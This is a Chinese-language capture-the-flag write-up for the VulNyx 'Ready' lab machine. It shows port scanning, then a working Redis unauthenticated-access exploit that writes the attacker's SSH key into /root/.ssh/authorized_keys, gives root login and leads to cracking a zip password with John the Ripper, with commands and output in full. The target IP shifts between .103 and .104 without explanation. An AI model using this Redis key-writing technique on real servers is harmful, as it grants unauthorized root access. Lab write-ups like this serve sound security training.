VulNyx - Ready

信息收集

arp

nmap

nikto

Redis未授权访问漏洞

漏洞扫描

redis-cli

写入公钥

ssh连接

get root.txt

信息收集

arp

┌─[root@parrot]─[~/vulnyx]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.103  08:00:27:6a:76:52  PCS Systemtechnik GmbH9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.980 seconds (129.29 hosts/sec). 9 responded

nmap

端口扫描┌─[✗]─[root@parrot]─[~/vulnyx]
└──╼ #nmap -p- 192.168.9.103 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-12 12:23 GMT
Nmap scan report for 192.168.9.103
Host is up (0.00031s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6379/tcp open  redis
8080/tcp open  http-proxy
MAC Address: 08:00:27:6A:76:52 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 2.55 seco┌─[root@parrot]─[~/vulnyx]
└──╼ #cat port.nmap | head -n 9 | tail -n 4 | awk -F "/" '{print($1)}' | xargs -n 4 | sed 's/ /,/g'
22,80,6379,8080

服务版本信息扫描┌─[root@parrot]─[~/vulnyx]
└──╼ #nmap -sC -sV  -O -p 22,80,6379,8080 192.168.9.103 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-12 12:25 GMT
Nmap scan report for 192.168.9.103
Host is up (0.00061s latency).PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 51:f9:f5:59:cd:45:4e:d1:2c:06:41:3b:a6:7a:91:19 (RSA)
|   256 5c:9f:60:b7:c5:50:fc:01:fa:37:7c:dc:16:54:87:3b (ECDSA)
|_  256 04:da:68:25:69:d6:2a:25:e2:5b:e2:99:36:36:d7:48 (ED25519)
80/tcp   open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Test Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
6379/tcp open  redis   Redis key-value store 6.0.16
8080/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache2 Test Debian Default Page: It works
MAC Address: 08:00:27:6A:76:52 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.38 seco

  靶机一共开放了4个端口22、80、8080还开放了6379 redis数据库的端口！这个6379端口应该就是突破口！

nikto

┌─[root@parrot]─[~/vulnyx]
└──╼ #nikto -h http://192.168.9.103
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.103
+ Target Hostname:    192.168.9.103
+ Target Port:        80
+ Start Time:         2024-04-12 12:30:36 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.54 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 29d1, size: 5e428196dbffb, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-04-12 12:30:55 (GMT0) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tes┌─[root@parrot]─[~/vulnyx]
└──╼ #nikto -h http://192.168.9.103:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.103
+ Target Hostname:    192.168.9.103
+ Target Port:        8080
+ Start Time:         2024-04-12 12:28:33 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.54 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 29d1, size: 5e4281ef033d9, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-04-12 12:28:54 (GMT0) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) teste

Redis未授权访问漏洞

靶机的主页没啥好看的，6379是突破口！

漏洞扫描

┌─[✗]─[root@parrot]─[~/vulnyx]
└──╼ #nmap --script redis-info -sV -p 6379 192.168.9.103 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-12 12:38 GMT
Nmap scan report for 192.168.9.103
Host is up (0.00045s latency).PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 6.0.16 (64 bits)
| redis-info: 
|   Version: 6.0.16
|   Operating System: Linux 5.10.0-16-amd64 x86_64
|   Architecture: 64 bits
|   Process ID: 357
|   Used CPU (sys): 1.325301
|   Used CPU (user): 0.000000
|   Connected clients: 2
|   Connected slaves: 0
|   Used memory: 873.01K
|   Role: master
|   Bind addresses: 
|     0.0.0.0
|   Client connections: 
|_    192.168.9.102
MAC Address: 08:00:27:6A:76:52 (Oracle VirtualBox virtual NIC)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds

redis版本是  6.0.16

redis连接可以用 nc 也可以用 redis-cli

redis-cli

┌─[root@parrot]─[~/vulnyx]
└──╼ #redis-cli -h 192.168.9.103
192.168.9.103:6379> help
redis-cli 7.0.15
To get help about Redis commands type:"help @<group>" to get a list of commands in <group>"help <command>" for help on <command>"help <tab>" to get a list of possible help topics"quit" to exitTo set redis-cli preferences:":set hints" enable online hints":set nohints" disable online hints
Set your preferences in ~/.redisclirc
192.168.9.103:6379>

使用info发现返回一些地址以及服务信息！说明不需要认证我们就可以利用redis！

写入公钥

┌─[root@parrot]─[~/vulnyx]
└──╼ #(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt┌─[root@parrot]─[~/vulnyx]
└──╼ #cat spaced_key.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDhOk4J/nc9g0wiCh6VSN1qXugxxw6pmTOaalM4+hNw+bDP68MTT3Ib0rIfFw7VG2Jb83M09hLJ81vQNOG4f5hZDRE/Rk9UklRSf5YMim7AToRMki7nKAGGcBSGdl0zu6zNMFfhXsBIHGz/4WRWOZeDFgypZg7UfG//BBA+xKQnKMiCeiSeDvfrSxhcHptr2GbZ0XMnxb2uVtFkWRL8skdKXsglhNe7q156yG4gihf/bPnGzW5//BS61ESD2UpwAxezQadRNW68ravIfp2NoV+sg/3Q4Ruj75Dn7H5cPfewHNaBalHdYF1ToBjIyEzcH6rqFJPWUo1YtXMac+UOixMYGusc1xjT38jk5fAHYYVI/Uv4S43I2aXQTl+Rb10Y9nbeHkIRFC8+Wyk8+UWGtsgvxTTdPsFdT3eOq+7pZcx8K6M+OAB+G94m9YKXC67VS4HiYjbRu/bhAwNh16nGRokcWgVj2Zi/NR6NGOflhHN95Rk+nQRlUJsRX+wFS05E2A0= root@parrot

将自己的公钥写入到一个文件中！

┌─[root@parrot]─[~/vulnyx]
└──╼ #cat spaced_key.txt | redis-cli -h 192.168.9.103 -x set ssh_key
OK192.168.9.103:6379> KEYS *
1) "ssh_key"写入成功！虽然写入成功了，但是我们还需要把公钥写入到靶机存放公钥地址的地方！

192.168.9.103:6379> config set dir /root/.ssh
OK
192.168.9.103:6379> config set dbfilename "authorized_keys"
OK
192.168.9.103:6379> save
OK
(0.51s)

我尝试直接写入到root/.ssh目录下，发现成功了！说明这个redis是以root方式运行的！

ssh连接

因为写入的是我的公钥，所以我们直接连接即可！┌─[✗]─[root@parrot]─[~/vulnyx]
└──╼ #ssh root@192.168.9.104
The authenticity of host '192.168.9.104 (192.168.9.104)' can't be established.
ED25519 key fingerprint is SHA256:7e6nZsLIg3VH7MUpoakFpn75ysrvjz0K0YGrMGHcpLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.104' (ED25519) to the list of known hosts.
Linux ready 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64
Last login: Wed Jul 12 18:22:32 2023
root@ready:~# id
uid=0(root) gid=0(root) groups=0(root)

root@ready:~# ls
root.zip
root@ready:~# 7z
-bash: 7z: orden no encontrada
root@ready:~# unzip
-bash: unzip: orden no encontrada
root@ready:~# python3 -m http.server 9900
Serving HTTP on 0.0.0.0 port 9900 (http://0.0.0.0:9900/) ...
192.168.9.102 - - [13/Apr/2024 03:02:18] "GET /root.zip HTTP/1.1" 200 -

┌─[✗]─[root@parrot]─[~/vulnyx]
└──╼ #wget http://192.168.9.104:9900/root.zip
--2024-04-13 01:02:18--  http://192.168.9.104:9900/root.zip
正在连接 192.168.9.104:9900... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：225 [application/zip]
正在保存至: “root.zip”root.zip                      100%[=================================================>]     225  --.-KB/s  用时 0s      2024-04-13 01:02:18 (35.3 MB/s) - 已保存 “root.zip” [225/225])

┌─[root@parrot]─[~/vulnyx]
└──╼ #unzip -l root.zip 
Archive:  root.zipLength      Date    Time    Name
---------  ---------- -----   ----32  2023-04-18 16:14   root.txt
---------                     -------32                     1 file┌─[root@parrot]─[~/vulnyx]
└──╼ #unzip root.zip 
[root.zip] root.txt password:

好家伙，需要密码啊！我们破解一下吧！

get root.txt

┌─[root@parrot]─[~/vulnyx]
└──╼ #zip2john root.zip >> root.list
ver 2.0 efh 5455 efh 7875 root.zip/root.txt PKZIP Encr: TS_chk, cmplen=43, decmplen=32, crc=68F3F801 ts=91CA cs=91ca type=8

┌─[✗]─[root@parrot]─[~/vulnyx]
└──╼ #john root.list /usr/share/wordlists/rockyou.txt0g 0:00:00:49  3/3 0g/s 38926Kp/s 38926Kc/s 38926KC/s sm1k2gr..snonb3y
0g 0:00:00:50  3/3 0g/s 38959Kp/s 38959Kc/s 38959KC/s rj4pfm5..rjta27t
already          (root.zip/root.txt)     
1g 0:00:00:51 DONE 3/3 (2024-04-13 01:12) 0.01960g/s 39021Kp/s 39021Kc/s 39021KC/s alremoa..alr160k
Use the "--show" option to display all of the cracked passwords reliably
Session complet

密码 already

┌─[root@parrot]─[~/vulnyx]
└──╼ #unzip root.zip 
Archive:  root.zip
[root.zip] root.txt password: inflating: root.txt        ┌─[root@parrot]─[~/vulnyx]
└──╼ #cat root.txt 
cf537b04dd79e859816334b89e85c435